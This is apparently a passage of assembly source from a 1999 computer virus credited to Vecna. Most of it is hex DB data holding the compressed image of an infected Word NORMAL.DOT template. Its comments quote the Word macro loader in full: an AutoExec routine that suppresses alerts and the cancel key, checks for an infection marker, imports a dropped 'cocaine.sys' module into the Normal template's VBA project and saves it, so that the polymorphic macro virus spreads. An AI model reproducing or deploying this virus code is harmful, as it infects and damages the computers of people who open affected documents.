0EAH,02CH,0EAH,022H,025H,01AH,0BEH,007H,053H,048H,045H,04CH,04CH,020H,015H DB 0DEH,02CH,0C0H,088H,020H,056H,042H,048H,049H,044H,042H,0A8H,033H,02AH,025H DB 034H,03DH,044H,073H,031H,030H,030H,03AH,0F4H,004H,000H,04BH,049H,008H,02FH DB 00DH,00AH,000H,008H,045H,04EH,044H,020H,053H,055H,042H,00DH,00AH,000H,000H DB 000H ;---------------------------------(MACRO.INC)--------------------------------- ;----------------------------------(NDOT.INC)--------------------------------- ;Macro poly data ;(c) Vecna 1999 ;This is the binary image of the LZ compressed NORMAL.DOT loader. The loader ;is, basically, a WinWord8 template with the code below. Its function is load ;the 2nd part of the macro virus code, polymorphic, from the disk. The routine ;that drop the image should be changed to make it _patch_ the ' COCAINE string ;and making the virus stop reinfecting, copying the first line of the virus ;dropped source to there... bahh, nevermind... :-) ;Sub AutoExec() ;On Error Goto erro ;Application.DisplayAlerts = False ;Application.EnableCancelKey = wdDisabled ;For i = 1 To NormalTemplate.VBProject.VBComponents.Count ;If NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(1,1) = "'Cocaine" Then GoTo erro ;Next i ;NormalTemplate.VBProject.VBComponents.Import("c:\cocaine.sys") ;NormalTemplate.Save ;erro: ;End Sub normaldot_size EQU 8292 ; size in bytes normaldot_sized dd 0 normaldot DB 000H,000H,000H,000H,000H,002H,0D0H,0CFH,011H,0E0H,0A1H,0B1H,01AH,0E1H DB 000H,00EH,001H,03EH,000H,003H,000H,0FEH,0FFH,0A8H,061H,009H,000H,006H,00AH DB 018H,001H,002H,00CH,021H,002H,004H,004H,003H,010H,000H,000H,023H,002H,009H DB 003H,014H,0FEH,0C8H,0FFH,0FFH,0FFH,0FFH,002H,00BH,000H,020H,002H,005H,002H DB 00BH,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,007H,000H,00FH,010H,00FH,010H,00CH,010H,0ECH DB 0A5H,0C1H,000H,049H,000H,016H,004H,000H,000H,001H,012H,0BFH,03FH,000H,012H DB 0C0H,002H,003H,012H,0DAH,002H,006H,003H,012H,002H,004H,00EH,000H,062H,06AH DB 062H,06AH,0B2H,0B3H,0B2H,0B3H,003H,0E0H,002H,014H,00EH,003H,016H,004H,016H DB 000H,01EH,00CH,000H,000H,0D0H,0D9H,001H,004H,004H,023H,00CH,00EH,023H,0F1H DB 0CAH,00CH,00FH,0FFH,0FFH,00FH,008H,010H,00FH,00CH,008H,019H,006H,009H,05DH DB 004H,008H,08CH,004H,006H,000H,000H,003H,008H,003H,004H,0B7H,067H,003H,00FH DB 00FH,008H,00BH,010H,014H,003H,021H,006H,004H,0BCH,00FH,008H,00FH,010H,002H DB 010H,002H,0BDH,000H,0C8H,006H,008H,007H,030H,018H,0D0H,0AFH,002H,000H,000H DB 0B6H,002H,014H,0E0H,002H,004H,003H,003H,00FH,008H,00FH,010H,00FH,010H,007H DB 010H,018H,012H,00FH,0C7H,002H,041H,076H,055H,0DFH,002H,008H,002H,007H,000H DB 00FH,008H,00FH,010H,003H,010H,024H,002H,029H,0CEH,002H,080H,0F4H,002H,034H DB 0C2H,012H,07EH,03EH,0F5H,0FFH,002H,010H,003H,002H,010H,015H,002H,008H,00FH DB 003H,007H,0F8H,007H,070H,00FH,020H,007H,018H,00FH,008H,007H,010H,003H,058H DB 003H,034H,007H,010H,007H,050H,0FFH,05FH,007H,008H,007H,018H,003H,024H,003H DB 004H,007H,010H,00FH,008H,00FH,010H,007H,010H,00FH,048H,00FH,010H,013H,020H DB 003H,058H,00FH,004H,0A0H,002H,011H,00EH,0FDH,0FBH,002H,004H,0AEH,002H,004H DB 003H,008H,007H,038H,00FH,008H,007H,010H,007H,070H,007H,050H,003H,010H,038H DB 002H,03CH,003H,008H,002H,007H,008H,003H,007H,020H,0FFH,006H,007H,038H,007H DB 008H,008H,021H,00FH,009H,00FH,010H,00EH,010H,007H,050H,007H,068H,0D4H,002H DB 020H,023H,050H,0A0H,010H,0DAH,09BH,0B8H,0F8H,0FFH,065H,0BEH,001H,027H,050H DB 007H,008H,007H,028H,007H,038H,002H,02FH,00FH,003H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FDH,0FFH,002H,010H,00DH,002H DB 004H,00FH,003H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,0EFH,0FFH,00FH,010H,00FH,010H,00CH,010H,042H,066H,001H,002H,004H,00CH DB 014H,00FH,00DH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0FBH,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,009H,010H,001H,000H,012H,0FCH,023H,000H,0FDH,009H DB 014H,00FH,00AH,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0EFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,007H,010H,082H,064H,000H,028H,000H,007H,015H,00FH DB 008H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,0FFH,03FH,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,012H,000H,0E8H,041H,00FH,000H,00AH,062H,007H DB 05BH,002H,008H,0E2H,069H,004H,01FH,0E2H,086H,040H,0F1H,0FFH,002H,000H,002H DB 008H,000H,000H,060H,006H,000H,04EH,000H,06FH,000H,072H,000H,06DH,000H,061H DB 000H,06CH,002H,01EH,003H,024H,004H,070H,000H,000H,06DH,048H,016H,082H,038H DB 002H,00FH,00CH,003H,036H,000H,041H,040H,0F2H,0FFH,0A1H,000H,036H,011H,040H DB 002H,016H,013H,000H,046H,002H,038H,06EH,000H,074H,000H,065H,000H,020H,000H DB 070H,002H,03EH,072H,040H,03DH,000H,0E1H,000H,067H,000H,02EH,006H,00EH,064H DB 002H,054H,0E3H,002H,022H,002H,02BH,00CH,003H,063H,095H,002H,000H,062H,078H DB 000H,0D2H,049H,001H,000H,0FFH,002H,001H,003H,010H,004H,020H,0FFH,0FFH,003H DB 008H,005H,029H,009H,00AH,087H,0BCH,003H,0AFH,082H,003H,019H,002H,090H,083H DB 0C8H,002H,007H,000H,007H,018H,005H,002H,018H,0FFH,002H,0C8H,000H,000H,005H DB 000H,056H,002H,088H,008H,000H,063H,000H,06EH,002H,088H,012H,000H,043H,000H DB 03AH,000H,05CH,000H,04CH,000H,049H,000H,028H,02AH,058H,000H,04FH,002H,00AH DB 06CH,002H,088H,061H,000H,064H,002H,022H,072H,002H,0A0H,064H,002H,00EH,074H DB 000H,0D4H,005H,0FFH,001H,003H,068H,056H,002H,042H,000H,002H,088H,004H,007H DB 00AH,005H,010H,003H,091H,002H,000H,025H,000H,054H,0B5H,0A8H,002H,035H,06DH DB 002H,0DFH,06CH,002H,059H,003H,0EBH,050H,002H,0D7H,06FH,000H,06AH,002H,016H DB 063H,002H,0FBH,02EH,002H,020H,080H,060H,068H,000H,069H,000H,073H,000H,044H DB 002H,055H,063H,000H,075H,000H,06DH,002H,01AH,013H,015H,02EH,014H,035H,000H DB 041H,002H,00EH,074H,002H,016H,045H,000H,078H,002H,014H,063H,012H,083H,011H DB 003H,072H,003H,053H,045H,000H,0A8H,0A2H,04DH,000H,050H,002H,0A0H,041H,002H DB 03FH,045H,002H,00AH,052H,002H,0A6H,04AH,000H,045H,002H,0B8H,054H,002H,0A0H DB 0A8H,01AH,054H,000H,048H,002H,0BAH,053H,002H,053H,04FH,002H,012H,055H,002H DB 02CH,045H,012H,0A4H,003H,01AH,041H,000H,055H,055H,01CH,002H,032H,04FH,002H DB 02AH,058H,002H,004H,043H,002H,0B0H,040H,000H,080H,003H,055H,002H,00AH,002H DB 003H,0E8H,020H,082H,04FH,001H,002H,066H,009H,010H,002H,013H,004H,003H,002H DB 010H,004H,007H,000H,002H,01DH,000H,000H,020H,000H,000H,008H,000H,010H,001H DB 040H,000H,000H,003H,002H,014H,047H,016H,090H,002H,02EH,002H,002H,006H,003H DB 005H,004H,005H,0F8H,056H,002H,003H,004H,003H,014H,002H,017H,008H,003H,002H DB 01DH,004H,00CH,054H,002H,0E3H,003H,0D9H,073H,002H,03EH,04EH,002H,0CDH,077H DB 02DH,000H,002H,008H,052H,002H,0DBH,023H,034H,06EH,002H,022H,035H,010H,090H DB 001H,002H,000H,005H,005H,001H,002H,0C0H,08BH,001H,007H,006H,002H,005H,007H DB 002H,013H,003H,003H,007H,077H,003H,00CH,080H,003H,005H,053H,000H,079H,012H DB 021H,026H,0BCH,062H,002H,03AH,023H,06AH,033H,022H,004H,07EH,00BH,006H,004H DB 002H,003H,001H,00FH,07EH,004H,0AEH,003H,036H,041H,012H,073H,016H,000H,069H DB 012H,07FH,003H,034H,022H,012H,0FBH,030H,008H,088H,018H,000H,000H,0C4H,002H DB 000H,000H,0A9H,0C1H,05CH,004H,0A1H,078H,01CH,033H,066H,07AH,002H,004H,003H DB 02CH,001H,000H,002H,017H,003H,009H,004H,004H,001H,004H,044H,004H,0F8H,0FDH DB 000H,003H,010H,004H,029H,004H,014H,013H,006H,003H,00EH,003H,004H,003H,011H DB 024H,00FH,0F5H,003H,015H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,03FH,0F8H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,006H,010H,013H DB 0CCH,058H,001H,0FFH,0FFH,012H,006H,010H,007H,007H,03BH,0EEH,00BH,00CH,007H DB 020H,0FFH,0FFH,00FH,008H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,0FDH,0FFH,00BH,010H,0FFH,00FH,001H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0F3H DB 000H,00FH,010H,00EH,010H,0FEH,0FFH,0F3H,02FH,0B3H,04AH,0ABH,016H,0D3H,006H DB 000H,000H,0E0H,085H,09FH,0F2H,0F9H,04FH,000H,0E8H,068H,010H,0ABH,091H,008H DB 000H,02BH,027H,0B3H,0D9H,030H,002H,023H,050H,0D2H,019H,0D3H,0B9H,002H,007H DB 06CH,055H,000H,088H,002H,010H,003H,03AH,090H,002H,008H,0D3H,027H,09CH,002H DB 008H,004H,002H,004H,0A8H,002H,004H,005H,002H,004H,0B8H,0ABH,05AH,002H,004H DB 0D3H,0EDH,0C4H,002H,008H,008H,002H,004H,0D4H,002H,004H,009H,002H,004H,0E4H DB 002H,004H,0B3H,0B4H,0F0H,002H,008H,00AH,04DH,055H,002H,004H,00CH,002H,04DH DB 0F2H,0F1H,000H,018H,002H,008H,00DH,002H,010H,024H,002H,008H,00EH,002H,008H DB 030H,002H,008H,00FH,0ADH,0D6H,002H,008H,038H,002H,008H,003H,074H,040H,002H DB 008H,013H,002H,010H,048H,002H,008H,003H,078H,0E4H,002H,06DH,01EH,002H,010H DB 002H,00FH,029H,0E0H,002H,006H,073H,000H,00FH,00CH,006H,002H,016H,056H,065H DB 063H,06EH,061H,000H,066H,009H,01CH,002H,010H,003H,028H,0C1H,00DH,003H,098H DB 04EH,06FH,072H,06DH,061H,0E2H,037H,003H,010H,009H,02CH,000H,004H,02CH,003H DB 060H,031H,000H,063H,06EH,003H,000H,003H,01CH,003H,074H,04DH,069H,063H,072H DB 06FH,073H,06FH,066H,074H,020H,057H,06FH,072H,064H,018H,014H,020H,038H,02EH DB 012H,00DH,0F2H,027H,000H,000H,08CH,086H,047H,002H,067H,000H,004H,00CH,0B0H DB 0E8H,03DH,010H,0FFH,0B8H,065H,0BEH,001H,004H,00CH,03CH,06FH,085H,003H,00CH DB 013H,018H,003H,0A0H,003H,008H,003H,028H,00FH,008H,01EH,08FH,00FH,00FH,0FFH DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,03FH,0E0H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FEH,0FFH,000H,000H,004H DB 000H,0E3H,0EEH,0E3H,09EH,009H,004H,001H,000H,003H,012H,002H,0D5H,0CDH,0D5H DB 09CH,02EH,01BH,010H,093H,097H,008H,000H,02BH,02CH,0F9H,054H,067H,0AEH,044H DB 002H,01FH,005H,00EH,014H,02CH,0E2H,0DDH,0E8H,002H,018H,0F3H,0C0H,002H,00BH DB 000H,068H,002H,00CH,0F3H,0B4H,070H,0B5H,0AAH,002H,008H,005H,002H,004H,07CH DB 002H,004H,0F3H,05CH,084H,002H,008H,011H,002H,004H,08CH,002H,004H,017H,002H DB 004H,094H,002H,004H,0DAH,0AAH,00BH,002H,004H,09CH,002H,004H,0F3H,0DCH,0A4H DB 002H,008H,0F3H,068H,0ACH,002H,008H,016H,002H,004H,0B4H,002H,004H,00DH,002H DB 004H,076H,0E1H,0BCH,002H,004H,003H,05CH,0C9H,002H,008H,003H,094H,0F7H,0F4H DB 004H,002H,010H,032H,039H,041H,000H,0F3H,050H,003H,078H,00BH,008H,0C3H,03BH DB 002H,01BH,004H,018H,0B3H,00DH,008H,000H,003H,064H,003H,010H,00FH,008H,007H DB 010H,01EH,002H,07DH,003H,040H,003H,004H,000H,00CH,017H,0D8H,002H,00DH,003H DB 065H,0F3H,0F5H,007H,002H,036H,054H,0EDH,074H,075H,06CH,06FH,004H,04CH,003H DB 020H,098H,002H,013H,003H,068H,059H,05DH,002H,007H,000H,020H,002H,005H,003H DB 014H,036H,002H,008H,002H,002H,004H,03EH,002H,004H,003H,010H,003H,00CH,00AH DB 002H,00CH,05FH,000H,02BH,050H,049H,044H,05FH,047H,055H,049H,044H,014H,05CH DB 003H,0B6H,041H,002H,016H,04EH,002H,004H,07BH,000H,0FAH,0FDH,030H,00EH,002H DB 02DH,008H,010H,00FH,00AH,003H,02AH,009H,014H,003H,00EH,00BH,004H,07DH,002H DB 04EH,003H,003H,01FH,0D5H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,0FFH,0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00BH,010H,07DH,0BDH,0E7H,0B4H,003H,0E2H,049H,0F3H DB 054H,0F3H,0B4H,0F3H,0B0H,0E3H,0FFH,0FEH,002H,029H,009H,002H,018H,0E3H,0D0H DB 0F3H,030H,0F3H,088H,00DH,002H,010H,0DEH,07AH,00EH,002H,004H,0F3H,0E4H,003H DB 020H,0F3H,0D4H,012H,002H,010H,0F3H,0BCH,014H,002H,008H,015H,002H,004H,0F3H DB 0C0H,0F3H,0E4H,003H,020H,019H,055H,05BH,002H,010H,01AH,002H,004H,01BH,002H DB 004H,01CH,002H,004H,01DH,002H,004H,0F3H,05FH,01FH,002H,008H,003H,020H,0FDH DB 002H,064H,022H,0ADH,0AAH,002H,00CH,028H,002H,004H,003H,010H,025H,002H,008H DB 026H,002H,004H,027H,002H,004H,029H,002H,004H,031H,002H,004H,02AH,002H,004H DB 0AAH,0FAH,02BH,002H,004H,02CH,002H,004H,02DH,002H,004H,02EH,002H,004H,02FH DB 002H,004H,030H,002H,004H,003H,034H,003H,004H,002H,047H,00FH,003H,0FFH,0FFH DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,047H,000H,00FH,010H,00FH,010H,004H,010H,052H,000H,06FH,002H,002H DB 074H,000H,020H,000H,045H,000H,06EH,000H,074H,010H,000H,000H,072H,000H,079H DB 012H,056H,020H,050H,072H,06FH,067H,072H,061H,06DH,061H,073H,000H,000H,008H DB 041H,052H,051H,055H,049H,056H,07EH,031H,000H,028H,000H,013H,08CH,000H,000H DB 028H,026H,000H,000H,0D1H,023H,010H,000H,04DH,069H,063H,072H,06FH,073H,06FH DB 066H,016H,000H,005H,001H,047H,024H,004H,049H,002H,005H,023H,044H,006H,009H DB 002H,002H,040H,000H,000H,0C0H,004H,006H,000H,046H,003H,007H,0A2H,0D8H,000H DB 080H,008H,000H,02BH,030H,030H,09DH,0C0H,0B1H,0E1H,09BH,0B8H,065H,0BEH,001H DB 024H,002H,015H,006H,040H,040H,023H,021H,002H,008H,031H,000H,054H,000H,061H DB 000H,062H,000H,06CH,000H,065H,002H,00EH,026H,000H,080H,04DH,017H,011H,000H DB 041H,072H,071H,075H,069H,076H,06FH,073H,020H,064H,065H,00FH,088H,081H,001H DB 00FH,088H,010H,000H,00EH,000H,002H,000H,002H,07BH,008H,003H,000H,04DH,049H DB 043H,052H,04FH,053H,050H,000H,07EH,032H,000H,01EH,008H,0B0H,0DAH,003H,0B0H DB 06FH,064H,065H,06CH,06FH,073H,000H,04DH,04FH,008H,020H,044H,045H,008H,002H DB 06AH,000H,010H,000H,000H,026H,003H,000H,0F0H,057H,002H,0FEH,072H,000H,008H DB 07EH,064H,000H,044H,002H,008H,063H,000H,075H,000H,06DH,002H,088H,013H,008H DB 003H,023H,00FH,004H,00FH,010H,003H,010H,01AH,0F8H,047H,000H,002H,001H,033H DB 034H,007H,081H,003H,014H,00FH,004H,00FH,010H,004H,010H,002H,080H,003H,008H DB 005H,000H,053H,004H,076H,06DH,0ABH,0EAH,012H,006H,013H,07CH,049H,012H,086H DB 066H,002H,08CH,072H,002H,08AH,061H,012H,090H,069H,002H,00CH,06EH,003H,029H DB 00FH,004H,006H,010H,0FEH,0E3H,028H,002H,080H,013H,072H,033H,0BCH,003H,084H DB 006H,017H,00FH,007H,00CH,010H,004H,07BH,004H,005H,000H,000H,005H,00FH,0FAH DB 00FH,090H,00FH,090H,0FDH,056H,00EH,090H,038H,002H,080H,003H,078H,007H,004H DB 